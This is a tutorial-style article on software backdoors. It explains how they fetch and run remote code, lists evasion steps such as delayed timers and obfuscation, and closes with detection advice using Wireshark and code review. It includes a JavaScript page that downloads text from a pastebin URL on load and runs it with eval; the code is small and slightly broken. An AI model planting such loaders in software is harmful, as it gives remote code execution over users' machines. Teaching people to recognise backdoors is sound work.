Everyone knows back doors in buildings! But what is a software backdoor virus?

How do backdoors work? How do I develop one and how can I protect myself against it?

What is a software backdoor?

The developer builds a backdoor into his software to…

• Gain access to your computer
• Copy, change, manipulate and delete files
• To spy on you
• Destroying your computer

A program with a backdoor is usually a harmless program. If the program downloads code over the Internet after installation, the program runs the new code with the same privileges as the program itself.

Who Uses Backdoors and Why?

Governments and intelligence agencies around the world are asking software companies to build crime and crime-solving backdoors into their products . The major disadvantage is that officials can use a backdoor for their purposes. Like data retention, backdoors are designed to fight crime.

Privacy takes a backseat to a backdoor and companies can no longer keep inventions and patents secret on their electronic devices.

Remote code execution

Let’s say the people in charge released free software that 100,000 happy customers downloaded. Now those responsible want to use the backdoor to spy on the customers and sell the data to a marketing company. Profit is never bad 🙂

BUT: Where is the “malicious” code stored?

Remote servers and storage

Those responsible store the code on public servers where anyone can store text. A well-known example is the online pastebin .

Usually, users use Pastebin to share a (long) piece of text with a colleague or something similar. Pastebin is a kind of collaboration tool.

The backdoor periodically downloads the contents of the pastebin and executes the code. In this way, those responsible can execute any code (remote code execution).

Programming the backdoor yourself

For the tutorial you need an HTML with a JavaScript section . This backdoor is based on the web technologies to demonstrate the function simple.

Developers use a backdoor in the programs that run directly on the computer without a browser. The WebAssembly web framework goes a step further and allows you to run C code directly on the hardware. The framework runs the code in a protected sandbox. Java , Python, Ruby and C programs are typical examples that have unrestricted access to the computer.

Procedure – Pseudocode

A backdoor works according to the same scheme, which the programmers disguise with useless code or unusual variable names.

1. The carrier software e.g. B. a word processing program starts a second process next to the main process.
2. There the program executes the backdoor code .
3. Some backdoors are configured in such a way that the process starts at a later time with a timer. The developer wants to prevent antivirus programs from immediately sounding the alarm.
4. Proposed safeguard #1 is more difficult to implement.
5. Once the new process is started, the program downloads the malicious code from the server . The author of the software knows the architecture of his software and can customize the functions of the software or make the malware run on the computer with a completely different malicious function.
6. The content of an HTTP GET request looks like code, but is similar to a regular string like “Hello World”.
7. An eval function (JavaScript) converts the string into executable code. 98% of applications do not need an eval function and IT security experts advise against it.
8. Once the eval function has converted the code, the malicious code executes.

JavaScript example

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Simple Backdoor</title>
    <script>
        window.onload = function () {
            console.log("Backdoor");
            var getBackdoorRequest = new XMLHttpRequest();

            getBackdoorRequest.open("GET", "https://pastebin.com/raw/aD4JR2aG");

            getBackdoorRequest.addEventListener('load', function (event) {
                if (getBackdoorRequest.status >= 200 && getBackdoorRequest.status < 300) {

                    eval(getBackdoorRequest.responseText);

                } else {
                    console.warn(getBackdoorRequest.statusText, getBackdoorRequest.responseText);
                }
            });
            request.send();

        }
    </script>

</head>

<body></body>

</html>

If a programmer wants to develop a backdoor, he makes sure that it is as unrecognizable as possible.

However, if an HTTP request immediately follows an eval function, you should take a closer look.

Protection against backdoors

A backdoor is firmly implemented in a program.

The user cannot detect a backdoor because it is within the compiled and packed binary code . For security reasons and to protect their own ideas, the developers do not want everyone to be able to see the code.

You can recognize a backdoor in two ways:

Examine traffic and identify patterns

If you cannot see the source code, you should monitor the incoming and outgoing Internet traffic on your computer.

The best way to do this is with Wireshark. Take a look at the Wireshark tutorial . I explain all the basics there.

The backdoor waits minutes to days with a timer. Then the backdoor downloads the code from a server.

This traffic is measurable – but monitoring it is time-consuming

Backdoor Control is better – code

Look at the code of an open source software to make sure that there is no backdoor

There you can search for the structure of a backdoor.

After you have built a backdoor and understood the principle, you can more easily recognize a backdoor in the open source code .

Some backdoors are programmed very cryptically , making them difficult to detect in a large coding project . Other participants and users of the software may notice the use of a backdoor and publicly denounce this malware.